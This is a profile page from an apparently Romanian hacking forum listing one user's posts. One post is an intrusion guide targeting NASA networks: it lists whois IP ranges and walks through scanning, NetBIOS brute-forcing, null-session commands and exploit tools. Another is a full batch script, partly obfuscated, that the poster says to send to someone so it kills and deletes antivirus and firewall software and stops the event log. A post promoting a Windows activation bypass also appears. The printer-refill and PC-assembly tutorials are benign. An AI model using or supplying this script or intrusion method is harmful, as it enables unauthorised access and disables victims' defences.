Jump to content

shadyRO

Members
  • Posts

    14
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

shadyRO's Achievements

Newbie

Newbie (1/14)

10

Reputation

  1. SURSA :hack NASA nu deschide postul daca esti newbie O sa va las ceva info de cum se hackeaza NASA. Daca esti un newbie,nu stii sa inlantuiesti proxyuri sau nu stii extrem de bine cum sa te protejezi ... nu are rost sa citesti textul ... nu te ajuta la nimic.Nu uita ca NASA are legatura cu guvernul ... si guvernul are bani si timp sa te caute ... Primul pas e sa mergeti la www.arin.net si sa cautati NASA,si vi se da o serie de ipuri.Atentie ... trebuie sa luati informatia exacta ! (adica de ex nu luati in seama NASA Technologies , mergeti direct la National Aeronaut. NASA (NASA-45) NASA (NASA-4 NASA (NASA-49) NASA - Space Station Project Office (NSSPO) NASA Ames Research Center (NARC) NASA CTC (NASACT-1) NASA Earth Science Data and Information System (NESDIS) NASA Federal Credit (NFC-6) NASA GLENN RESEARCH CENTER (NGRC) NASA GLENN RESEARCH CENTER (#2) (NGRC2) NASA Goddard Space Flight Center (NGSFC) NASA Langley (NASALA) NASA Langley Research Center (NLRC) NASA Lewis Research Center (NLRC-1) NASA Science Internet (NSI-1) NASA Science Network (NSN-7) Nasa Services (NASASE-1) Nasa Services, Inc. (NASASE) National Aeronautics and Space Administration (NASA) NASA - John H. Glenn Research Centerat Lewis Field (ZN14-ARIN) E-mail .gov +1-216-433-9850 NASA Abuse (NASAA-ARIN) E-mail +1-256-544-5623 NASA Ames Research Center, NAS Division M/S 258-6 (LG-ORG-ARIN) E-mail .gov +1-650-604-4444 NASA Information Services Network (NISN-ARIN) E-mail .gov +1-256-961-9397 NASA Langley Research Center (ZN4-ARIN) E-mail .gov +1-757-864-7799 NASA Langley Research Center (NC3-ORG-ARIN) E-mail .gov +1-757-864-7799 NASA, Langley Research Center (LRN2-ARIN) E-mail .gov +1-757-864-7799 NASA (AS1843) NASA-KSC-AS 1843 - 1848 NASA (AS270) PSCNI-AS 270 NASA Ames Research Center (AS771) NSN-RICE-AS 771 NASA Ames Research Center (AS372) NSN-AMES-AS 372 NASA Ames Research Center (AS24) AMES-NAS-GW 24 NASA Ames Research Center (AS10888) EI-AIX 10888 NASA Ames Research Center (AS1262) NSN-NCAR-AS-AS 1262 NASA Ames Research Center (AS1263) NSN-NCAR-AS-AS 1263 NASA Ames Research Center (AS23) RIACS-AS 23 NASA Ames Research Center (AS41) AMES 41 NASA Earth Science Data and Information System (AS22767) NASA-ESDIS-NET 22767 NASA Goddard Space Flight Center (AS1749) NASA-GSFC-AS 1749 NASA Goddard Space Flight Center (AS7847) NASA-HPCC-ESS 7847 NASA Langley Research Center (AS1254) NASA-LARC-AS 1254 NASA Lewis Research Center (AS1316) LERC-AS-AS 1316 NASA Science Internet (AS2143) NSN-FFIX-W 2143 NASA Science Internet (AS2142) NSI-FFIX-E 2142 NASA Science Network (AS297) NSN-UMD-AS 297 NASA NASA-NSSTC (NET-192-67-107-0-2) 192.67.107.0 - 192.67.108.255 NASA - Space Station Project Office NASA-SSFPO-ISO (NET-192-67-117-0-1) 192.67.117.0 - 192.67.117.255 NASA Ames Research Center NETBLK-NSI1 (NET-198-116-3-0-1) 198.116.3.0 - 198.116.3.255 NASA Ames Research Center ARC-OMM (NET-198-120-8-0-1) 198.120.8.0 - 198.120.8.255 NASA Ames Research Center NETBLK-NSI-1 (NET-198-116-7-0-1) 198.116.7.0 - 198.116.7.255 NASA Ames Research Center NETBLK-NSI2 (NET-198-116-2-0-1) 198.116.2.0 - 198.116.2.255 NASA CTC RESO-216-204-34-24 (NET-216-204-34-24-1) 216.204.34.24 - 216.204.34.31 NASA Federal Credit UU-63-88-86-80 (NET-63-88-86-80-1) 63.88.86.80 - 63.88.86.95 NASA GLENN RESEARCH CENTER TAC-66-181-41-72 (NET-66-181-41-72-1) 66.181.41.72 - 66.181.41.79 NASA GLENN RESEARCH CENTER TAC-66-181-42-200 (NET-66-181-42-200-1) 66.181.42.200 - 66.181.42.207 NASA GLENN RESEARCH CENTER TAC-66-181-38-128 (NET-66-181-38-128-1) 66.181.38.128 - 66.181.38.135 NASA GLENN RESEARCH CENTER (#2) TAC-66-181-39-80 (NET-66-181-39-80-1) 66.181.39.80 - 66.181.39.87 NASA Goddard Space Flight Center GSFC14 (NET-192-225-73-0-1) 192.225.73.0 - 192.225.73.255 NASA Goddard Space Flight Center GSFC20 (NET-192-225-79-0-1) 192.225.79.0 - 192.225.79.255 NASA Goddard Space Flight Center GSFC37 (NET-198-119-0-0-1) 198.119.0.0 - 198.119.63.255 NASA Langley NASA-LANGLEY-3 (NET-216-54-42-0-1) 216.54.42.0 - 216.54.42.255 NASA Langley NASA-LANGLEY-2 (NET-216-54-41-0-1) 216.54.41.0 - 216.54.41.255 NASA Langley NASA-LANGLEY-1 (NET-216-54-40-0-1) 216.54.40.0 - 216.54.40.255 NASA Langley NASA-LANGLEY-4 (NET-216-54-43-0-1) 216.54.43.0 - 216.54.43.255 NASA Langley NASA-LANGLEY-5 (NET-216-54-44-0-1) 216.54.44.0 - 216.54.44.255 NASA Langley NASA-LANGLEY-6 (NET-216-54-45-0-1) 216.54.45.0 - 216.54.45.255 NASA Langley NASA-LANGLEY-7 (NET-216-54-46-0-1) 216.54.46.0 - 216.54.46.255 NASA Langley NASA-LANGLEY-8 (NET-216-54-47-0-1) 216.54.47.0 - 216.54.47.255 NASA Langley Research Center LARCNET-3 (NET-192-239-114-0-1) 192.239.114.0 - 192.239.114.25 5 NASA Langley Research Center LARCNET-5 (NET-192-239-116-0-1) 192.239.116.0 - 192.239.116.25 5 NASA Langley Research Center LARCNET-7 (NET-192-239-118-0-1) 192.239.118.0 - 192.239.118.25 5 NASA Langley Research Center LARCNET-6 (NET-192-239-117-0-1) 192.239.117.0 - 192.239.117.25 5 NASA Langley Research Center LARCNET-8 (NET-192-239-119-0-1) 192.239.119.0 - 192.239.119.25 5 NASA Langley Research Center LARCNET-2 (NET-192-239-113-0-1) 192.239.113.0 - 192.239.113.25 5 NASA Langley Research Center LARCNET-4 (NET-192-239-115-0-1) 192.239.115.0 - 192.239.115.25 5 NASA Science Internet SONDRESTROM (NET-192-136-69-0-1) 192.136.69.0 - 192.136.69.255 Nasa Services ERSD-13162674 (NET-66-47-196-184-1) 66.47.196.184 - 66.47.196.191 Nasa Services, Inc. IEN-NASAINC (NET-64-248-117-32-1) 64.248.117.32 - 64.248.117.63 NASA NOVA-200 (NET-207-227-126-32-1) 207.227.126.32 - 207.227.126.47 NASA AMES RESCH CTR SBCIS-101731-15910 (NET-66-123-29-144-1) 66.123.29.144 - 66.123.29.151 NASA Convection and Moisture Experiment CAMEX4 (NET-198-116-14-0-1) 198.116.14.0 - 198.116.14.255 NASA Federal Credit Union DIGEX-NFCU-BLK1 (NET-206-205-36-0-1) 206.205.36.0 - 206.205.36.255 Nasa Tech SBCIS-101730-112853 (NET-65-68-41-16-1) 65.68.41.16 - 65.68.41.23 # ARIN Whois database, last updated 2002-10-24 19:05 # Enter ? for additional hints on searching ARIN's Whois database. Prima impresie e ca se folosesc niste ranguri de ip enorme ... dar in realitate nu se folosesc toate ipurile asociate ... ne informeaza aproximativ unde sunt localizate sistemele NASA. Pt a continua aveti nevoie de LANguard Network Scanner (http://www.tucows.com/preview/213719) ... puneti rangul de ipuri si scanati.Dupa ceva timp va apar cam 8 sisteme active.Asa arata outputul unuia din ele (in cazul asta se numeste StarGate ... ce original ... puff ... ) 198.116.11.45 Username: Stargate Operating System: Windows NT 4.0 Open Ports: 21 - 135 - 139 LAN Manager : NT LAN Manager 4.0 Domain : WORKGROUP Operating System : Windows NT 4.0 Open Ports (3) 21 [ Ftp => File Transfer Protocol ] 220 FTP Software, Inc. Win32 FTP Server 5,0,0,116 ready. 135 [ epmap => DCE endpoint resolution ] 139 [ Netbios-ssn => NETBIOS Session Service ] [/madfran] E un sistem de la Universitatea din Rhode Island ! [madfran/] ipul care apare e al sistemului "prins" , si avem si log in-ul.Insa informatia mai improtanta : in cazul asta avem de aface cu un windows nt 4.0 , si porturile deschise. Pasul urmator ar fi un atac prin netbios.Pt asta puteti folosi Shadow Scan (cred ca l-am postat eu pe la programe ... cautati ..).Si la Shadwo S. sa fie activata optiunea NetBios Auditing Tool,si faceti un atac brute-force pt a scoate passul... sigur va iese.Si inafara de StarGate , am mai gasit un user "Administrator" ... asa ca nu cred ca dureaza multa scoaterea passului , vazand log inul .Deasemenea se poate folosi Red Button ,care functioneaza in WinNT 3.5x cat si in 4.0 .Partea cu exploiturile o sar , dar fac o mica explicatie de fiecare (Red Button, RDS, Unicode, Null session, Legion ): -Red Button : Intri fara log in si pass , folosind porturile 137,138 si 139. -RDS Microsoft IIS : protocol http ; vulnerabilitatea RDSului se obtine prin Data Factory din Remote Data Service,care e un component MSDAC ...si asta implica acces la distanta la date default.Un client fara autorizare are permis sa acceseze OLE DB din server.Descriere tehnica : -Folosind metoda Head si Post : creaza un GET la /msdac/msadcs.dll -Se codifica zecimal chemarile la URL -Schimband Mime (original) -Creand o tabla .MDB in loc de numele original -Unicode : protocol http ... e un bug destul de celebru , si prostesc -Null session : protocol NetBios si NetBEUI (asta ar fi exploitul care ar trebui sa-l folositi impotriva celor de la NASA) ... comanda ar fi : Net use \\xxx.xxx.xxx.xxx\IPC$ "/user:" (pt asta puteti folosi Legion 2.1 sau Cerberus Internet Scanner) ... Cerberus Internet Scanne e mai efectiv (cea mai efectiva metoda fiind prin netbios)... poati ataca prin metodele spuse mai sus ... dar si Getsvrinfo, GNITvse rc1, NB4, NBName, Net Fizz, NtInfoScan, Winfingerprint 2.2.6 sau Winfo 1.4. Pt a intra in sistem aveti nevoie de Essential Net tools... scrieti un rang de ipuri (ex 198.116.11.45 - 198.116.11.80 ) ... si va apar mai multe recursuri ... dati click stanga si alegeti open computer.Daca nu e posibil folositi PQwak pt crackeat passul. ************************ Dupa cum ati putut vedea , s-au folosit tehnici simple ,dar letale.Deasemenea ramane demonstrat ca oricat de importante ar fi sistemele , nu inceteaza sa fie vulnerabile ... asadar mereu o sa fie posibil sa practicam hackul pe FBI , pentagon , NASA ... etc. ... si nu e nevoie ca atacantul sa fie expert ... salut! P.S. : NU MA FAC RESPONSABIL DE CUM FOLOSITI INFORMATIA PE CARE AM POSTATO ...
  2. Salvati asta cu .bat , deschide sau trimite asta la cineva si la deschidere iti sterge av. @ echo off rem --------------------------------- rem Permanently Kill Anti-Virus net stop “Security Center” netsh firewall set opmode mode=disable tskill /A av* tskill /A fire* tskill /A anti* cls tskill /A spy* tskill /A bullguard tskill /A PersFw tskill /A KAV* tskill /A ZONEALARM tskill /A SAFEWEB cls tskill /A OUTPOST tskill /A nv* tskill /A nav* tskill /A F-* tskill /A ESAFE tskill /A cle cls tskill /A BLACKICE tskill /A def* tskill /A kav tskill /A kav* tskill /A avg* tskill /A ash* cls tskill /A aswupdsv tskill /A ewid* tskill /A guard* tskill /A guar* tskill /A gcasDt* tskill /A msmp* cls tskill /A mcafe* tskill /A mghtml tskill /A msiexec tskill /A outpost tskill /A isafe tskill /A zap* cls tskill /A zauinst tskill /A upd* tskill /A zlclien* tskill /A minilog tskill /A cc* tskill /A norton* cls tskill /A norton au* tskill /A ccc* tskill /A npfmn* tskill /A loge* tskill /A nisum* tskill /A issvc tskill /A tmp* cls tskill /A tmn* tskill /A pcc* tskill /A cpd* tskill /A pop* tskill /A pav* tskill /A padmin cls tskill /A panda* tskill /A avsch* tskill /A sche* tskill /A syman* tskill /A virus* tskill /A realm* cls tskill /A sweep* tskill /A scan* tskill /A ad-* tskill /A safe* tskill /A avas* tskill /A norm* cls tskill /A offg* del /Q /F C:\Program Files\alwils~1\avast4\*.* del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe del /Q /F C:\Program Files\kasper~1\*.exe cls del /Q /F C:\Program Files\trojan~1\*.exe del /Q /F C:\Program Files\f-prot95\*.dll del /Q /F C:\Program Files\tbav\*.dat cls del /Q /F C:\Program Files\avpersonal\*.vdf del /Q /F C:\Program Files\Norton~1\*.cnt del /Q /F C:\Program Files\Mcafee\*.* cls del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.* del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.* del /Q /F C:\Program Files\Norton~1\Norton~1\*.* del /Q /F C:\Program Files\Norton~1\*.* cls del /Q /F C:\Program Files\avgamsr\*.exe del /Q /F C:\Program Files\avgamsvr\*.exe del /Q /F C:\Program Files\avgemc\*.exe cls del /Q /F C:\Program Files\avgcc\*.exe del /Q /F C:\Program Files\avgupsvc\*.exe del /Q /F C:\Program Files\grisoft del /Q /F C:\Program Files\nood32krn\*.exe del /Q /F C:\Program Files\nood32\*.exe cls del /Q /F C:\Program Files\nod32 del /Q /F C:\Program Files\nood32 del /Q /F C:\Program Files\kav\*.exe del /Q /F C:\Program Files\kavmm\*.exe del /Q /F C:\Program Files\kaspersky\*.* cls del /Q /F C:\Program Files\ewidoctrl\*.exe del /Q /F C:\Program Files\guard\*.exe del /Q /F C:\Program Files\ewido\*.exe cls del /Q /F C:\Program Files\pavprsrv\*.exe del /Q /F C:\Program Files\pavprot\*.exe del /Q /F C:\Program Files\avengine\*.exe cls del /Q /F C:\Program Files\apvxdwin\*.exe del /Q /F C:\Program Files\webproxy\*.exe del /Q /F C:\Program Files\panda software\*.* rem --------------------------------- rem --------------------------------- rem Temp Kill Anti-Virus net stop “Security Center” netsh firewall set opmode mode=disable tskill /A av* tskill /A fire* tskill /A anti* cls tskill /A spy* tskill /A bullguard tskill /A PersFw tskill /A KAV* tskill /A ZONEALARM tskill /A SAFEWEB cls tskill /A OUTPOST tskill /A nv* tskill /A nav* tskill /A F-* tskill /A ESAFE tskill /A cle cls tskill /A BLACKICE tskill /A def* tskill /A kav tskill /A kav* tskill /A avg* tskill /A ash* cls tskill /A aswupdsv tskill /A ewid* tskill /A guard* tskill /A guar* tskill /A gcasDt* tskill /A msmp* cls tskill /A mcafe* tskill /A mghtml tskill /A msiexec tskill /A outpost tskill /A isafe tskill /A zap* cls tskill /A zauinst tskill /A upd* tskill /A zlclien* tskill /A minilog tskill /A cc* tskill /A norton* cls tskill /A norton au* tskill /A ccc* tskill /A npfmn* tskill /A loge* tskill /A nisum* tskill /A issvc tskill /A tmp* cls tskill /A tmn* tskill /A pcc* tskill /A cpd* tskill /A pop* tskill /A pav* tskill /A padmin cls tskill /A panda* tskill /A avsch* tskill /A sche* tskill /A syman* tskill /A virus* tskill /A realm* cls tskill /A sweep* tskill /A scan* tskill /A ad-* tskill /A safe* tskill /A avas* tskill /A norm* cls tskill /A offg* rem --------------------------------- rem --------------------------------- rem Encripted AV Killer del /F /Q %SystemDrive%\recycler\S-1-5-21-1202660629-261903793-725345543-1003\run.bat set ii=ne set ywe=st set ury=t set iej=op set jt53=Syma set o6t=nor set lyd2=fee set h3d=ton set gf45=ntec set own5=McA %ii%%ury% %ywe%%iej% "Security Center" /y %ii%%ury% %ywe%%iej% "Automatic Updates" /y %ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y %ii%%ury% %ywe%%iej% "SAVScan" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Firewall Monitor Service" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto-Protect Service" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y %ii%%ury% %ywe%%iej% "%own5%%lyd2% Spamkiller Server" /y %ii%%ury% %ywe%%iej% "%own5%%lyd2% Personal Firewall Service" /y %ii%%ury% %ywe%%iej% "%own5%%lyd2% SecurityCenter Update Manager" /y %ii%%ury% %ywe%%iej% "%jt53%%gf45% SPBBCSvc" /y cls %ii%%ury% %ywe%%iej% "Ahnlab Task Scheduler" /y %ii%%ury% %ywe%%iej% navapsvc /y %ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y %ii%%ury% %ywe%%iej% vrmonsvc /y %ii%%ury% %ywe%%iej% MonSvcNT /y %ii%%ury% %ywe%%iej% SAVScan /y %ii%%ury% %ywe%%iej% NProtectService /y %ii%%ury% %ywe%%iej% ccSetMGR /y %ii%%ury% %ywe%%iej% ccEvtMGR /y %ii%%ury% %ywe%%iej% srservice /y %ii%%ury% %ywe%%iej% "%jt53%%gf45% Network Drivers Service" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% Unerase Protection" /y %ii%%ury% %ywe%%iej% MskService /y %ii%%ury% %ywe%%iej% MpfService /y %ii%%ury% %ywe%%iej% mcupdmgr.exe /y %ii%%ury% %ywe%%iej% "%own5%%lyd2%AntiSpyware" /y %ii%%ury% %ywe%%iej% helpsvc /y %ii%%ury% %ywe%%iej% ERSvc /y %ii%%ury% %ywe%%iej% "*%o6t%%h3d%*" /y %ii%%ury% %ywe%%iej% "*%jt53%%gf45%*" /y %ii%%ury% %ywe%%iej% "*%own5%%lyd2%*" /y cls %ii%%ury% %ywe%%iej% ccPwdSvc /y %ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y %ii%%ury% %ywe%%iej% navapsvc /y %ii%%ury% %ywe%%iej% "Serv-U" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y %ii%%ury% %ywe%%iej% "%jt53%%gf45% AntiVirus Client" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Server" /y %ii%%ury% %ywe%%iej% "NAV Alert" /y %ii%%ury% %ywe%%iej% "Nav Auto-Protect" /y cls %ii%%ury% %ywe%%iej% "McShield" /y %ii%%ury% %ywe%%iej% "DefWatch" /y %ii%%ury% %ywe%%iej% eventlog /y %ii%%ury% %ywe%%iej% InoRPC /y %ii%%ury% %ywe%%iej% InoRT /y %ii%%ury% %ywe%%iej% InoTask /y cls %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Corporate Edition" /y %ii%%ury% %ywe%%iej% "ViRobot Professional Monitoring" /y %ii%%ury% %ywe%%iej% "PC-cillin Personal Firewall" /y %ii%%ury% %ywe%%iej% "Trend Micro Proxy Service" /y %ii%%ury% %ywe%%iej% "Trend NT Realtime Service" /y %ii%%ury% %ywe%%iej% "%own5%%lyd2%.com McShield" /y %ii%%ury% %ywe%%iej% "%own5%%lyd2%.com VirusScan Online Realtime Engine" /y %ii%%ury% %ywe%%iej% "SyGateService" /y %ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y cls %ii%%ury% %ywe%%iej% "Sophos Anti-Virus" /y %ii%%ury% %ywe%%iej% "Sophos Anti-Virus Network" /y %ii%%ury% %ywe%%iej% "eTrust Antivirus Job Server" /y %ii%%ury% %ywe%%iej% "eTrust Antivirus Realtime Server" /y %ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y %ii%%ury% %ywe%%iej% "eTrust Antivirus RPC Server" /y cls %ii%%ury% %ywe%%iej% netsvcs %ii%%ury% %ywe%%iej% spoolnt rem ---------------------------------
  3. Am o imprimanta CANON si m-am gandit ca poate cineva din lumea asta cauta si asa ceva... Sa incep tutorialul: DE CE AI NEVOIE: Un kit de reumplere pentru tipul de cartus. In cazul de fata, un Canon care merge cu cartuse de tipul PG-40 si PG-50. tus negru. - 2 seringi cu 2×20 de ml de tus. Yep, am dat 20 lei pentru 40 ml de tus negru. Cu asta am redus costul la 5 milioane pe litru de tus. Mighty expensive. - o surubelnita pentru gaurit cartusul - niste plastice - instructiuni - suport si seringa de desfundat 1.Scoatem cartusul din imprimanta. Se porneste imprimanta, astepti vreo 5 minute sa-si faca ea treburile, deschizi capacul..Si apesi pe cartus. In jos. O sa faca tzac, si se trage afara. 2.Se monteaza cartusul in suportul de umplere, si da jos folia protectoare, din partea de sus, si se da gaura in cartus in locul specificat.Se baga cu seringa aproximativ 10 ml de tus. Cu grija sa nu va murdariti prea tare. 3.Mai departe. In interiorul cartusului este de fapt un buretel. Care nu poate sa abosoarba asa rapid tusul, si cand scoateti acul o sa curga un picut pe afara. Asta daca nu trageti de manerul seringii inapoi. 4.Se verifica capul cartusului, sa nu fie infundat. Se sterge de un patratel de hartie igienica / servetel. Urma care trebuie sa o lase, neagra si cu o grosime egala. Urmele din partea dreapta sunt “corecte”, cele din partea stanga arata ca s-a uscat un picut cerneala.Daca nu vrea si nu vrea sa lase urme, trebuie desfundat cu seringa. Cu cartusul tinut in suport, se baga seringa de desfundare in cauciucul din partea de jos si se trage. Teoretic, asta ar creea un vid care forteaza cerneala sa curga si sa se desfunde. GATA
  4. TUTORIAL MONTARE PC... va trebuie:- o placa de baza - un procesor - un cooler pentru procesor - un hard-disk - un dvd-rw sau cd-romul - o placa video - memorii RAM - o carcasa care sa le tina pe toate CE SUNT ASTEA? -Procesorul este “creierul” calculatorului. El spun e componentelor ce sa faca. -Hard-diskul este locul unde intra toate informatiile (imagini,filme etc.) -Placa video-proceseaza informatia ce vine la monitor(monitor=ecranu' ala pe care vezi tu ce am scris acum) -Memoria RAM-ea stocheaza informatia de la aplicatile folosite... -CD-rom-cutia aia care citeste cd-uri LOCUL PIESELOR: Acum de precizat este ca piesele unui pc nu se pot monta gresit. 1.Aceasta este cutia procesorului Se trage de siguranta de pe placa de baza in stanga (fata de cum e placa de baza), si se ridica. Se ridica si capacelul care fixeaza procesorul, si se scoate plasticul care protejeaza slot-ul. Procesorul (partea de sus – partea de jos) are 2 ciupituri pe margine, pentru a nu-l putea monta gresit. La fel si slot-ul de pe placa de baza. Mare grija sa nu indoiti vreun pin Dupa ce ati montat procesorul in locas, fixati capacelul si inchideti cu siguranta. Cooler-ul trebuie sa aiba pasta conductoare pe partea care o sa vina in contact cu procesorul. Daca nu are “out-of-the-box”, atunci are un tubulet cu pasta, cu care trebuie uns procesorul. Coolerul se apasa pe placa pana face “click” pentru fiecare din cele 4 picioruse. Un pic de atentie la cablu, trebuie pus in asa fel incat sa nu poata fi prins de catre ventilator. 2.RAM-ul Asta e simplu. Se arunca un ochi in manualul placii de baza, si se cauta care slot este slotul 1. pentru a functiona in modul dual-channel, trebuie bagate memoriile in sloturile 1 si 3 Se trag motzurile (alea albe) in lateral, si se apasa memoriile pana sigurantele se intorc in pozitia initiala. Iarasi, trebuie sa faca click, si iarasi, exista un singur fel de a monta memoriile. Nu ai cum sa gresesti.in poza prima memorie este bagata (slotul 1 este cel galben de sus), iar slotul 3 are motzul dat intr-o parte, pentru exemplificare. 3.SURUBURI-urmatorul pas... In cutia cu placa de baza o sa gasiti o punguta cu suruburi. O mica explicatie pentru ce reprezinta fiecare: In imaginea din stanga: suruburi rotunjite, care sunt folosite la fixarea placii de baza pe carcasa. , si a cd-rom-ului. Celalalt tip de surub este pentru fixarea capacelor carcasei si a hard-ului, modele mai vechi In poza 2, de la stanga la dreapta, se afla un inaltator. placa de baza nu se prinde direct de carcasa, ci vine pe aceste picioruse In poza 3, este o clama de plastic care fixeaza placa de baza in carcasa, si nu-i permite sa “falfaie”; 4.SA MONTAM PLACA DE BAZA... In primul rand monteaza inaltatoarele si plasticele care fixeaza placa, ca in poza Dupa aceea, se scoate placuta din spatele carcasei, pe unde vor iesi mufele, si se inlocuieste cu modelul cu care a venit placa de baza. Fata cea noua se monteaza din interiorul carcasei, prin presare. daca nu sta foarte fix nici o grija, va sta cand va fi montata si placa de baza. Se monteaza placa de baza si se strang suruburile. 5. CABLURI-ce e mai urat ca ele? Fiecare cablu are scris pe mufa pentru ce este: butonul de reset (reset sw), butonul de pornire, led-ul pentru hard (hdd led), speaker-ul (speaker), mufa catre usb-urile din fata (USB), mufa audio pentru casti si microfonul din fata carcasei (audio), ledul pentru cand pc-ul este pornit (power led) 6.CD-rom-Cutia de cd-uri ACUM! Se scoate fata de la unul din cele doua sloturi (se impinge dinauntru inspre afara), se baga cd-rom-ul si se prinde in suruburi, de preferat de ambele parti. In poza am incercuit locurile de unde se prind suruburile cd-rom-ului. La fel si cu hardul, insa acesta se monteaza in partea de jos a carcasei, avand grija ca sa <u>nu<u> fie in prelungirea slotului albastru, unde va veni placa video. Se fac legaturile la cd-rom si hard. 2 fire trebuie pentru fiecare, unul pentru alimentare, si unul pentru a trimite informatiile. In poza sunt 3 tipuri de cabluri de alimentare. Cel mai din stanga, ii spune molex, si este cablul de alimentare pentru cd-rom-uri si hardurile pe IDE. cel din mijloc este tot molex (mic), si alimenteaza floppy diskul (floapa). Cel mai din dreapta, negru, este cablul de alimentare sata, pentru hard-disk. Rule of thumb, mufele au o singura pozitie in care pot fi conectate. In configuratia actuala, un molex la cd-rom, si un cablu de alimentare sata la hard. Next, conectarea cablurilor pentru interfata: Cablul albastru este cablul IDE, iar cel galben cu mufa mica este SATA. Mai este un cablu in cutie, pentru conectarea la floppy. In poza am incercuit masura de siguranta ca sa nu poti baga mufa gresit (un pin blocat). Pe hard / cdrom o sa fie un pin lipsa. deci nu e loc de greseala nici aici. Daca hardul este pe IDE, se poate monta pe acelasi cablu cu cd-rom-ul (cablul IDE are 2 mufe, si pe acelasi cablu pot fi conectate doua harduri / cdroame / 1 hard si 1 cd-rom) 7.PLACA VIDEO Marea majoritate a placilor sunt pe pci-express (mufa albastra de pe placa). Se scoate bucatica de metal din spatele carcasei (cu grija, ca e ascutita). Placa video se apasa pana nu mai merge, dupa care se strange surubul care o tine sa nu cada. Pe placa s-ar putea sa fie clema de plastic, in capatul opus iesirii, s-ar putea sa faca un click mic. Optional: se monteaza eventualele placi audio / de retea, in sloturile pci. la fel ca la placa video Et voila, rezultatul final si functional. A se observa lungimea placii video, care ar fi stanjenit cablurile hard-disk-ului daca erau montate pe aceeasi linie: GATA....!
  5. Da!El iti detecteaza ca ai windows original. Ai acces la update-uri , la antivirusul lor si la altele care necesita windows original!
  6. Sunt multe tutoriale de acest gen, cu activarea windowsului. Insa unele nu merg sau necesita ceva timp. Metoda care e prezentata in acest tutorial adauga un registru si...HAPPY Windows is Genuine! Tre sa sti sa dai un click si...cam atat.
  7. Merge 100% . Incercat in chrome.
  8. ce e nou?... mai multe butoane si nu mai e copie IE. WebBrowser1.exe 2shared - download
  9. imagine:Image Upload ! download:Browser v2.exe 2shared - download
  10. In primul rand am posturi putine dar, nu postez numai aiurea.Acesta este un browser simplu...(mai sunt sute dar, daca cuiva ii trebuie e bine venit) imagine cu programul : Image Upload ! link de descarcare: simple browser bY shadyRo.exe 2shared - download
  11. imi cer scuze !!! am gresit locul pe forum.
  12. In primul rand am primul post dar, nu postez numai aiurea.Acesta este un browser simplu...(mai sunt sute dar, daca cuiva ii trebuie e bine venit) imagine cu programul : Image Upload ! link de descarcare: simple browser bY shadyRo.exe 2shared - download
  13. merge... l-am incercat fain programu
×
×
  • Create New...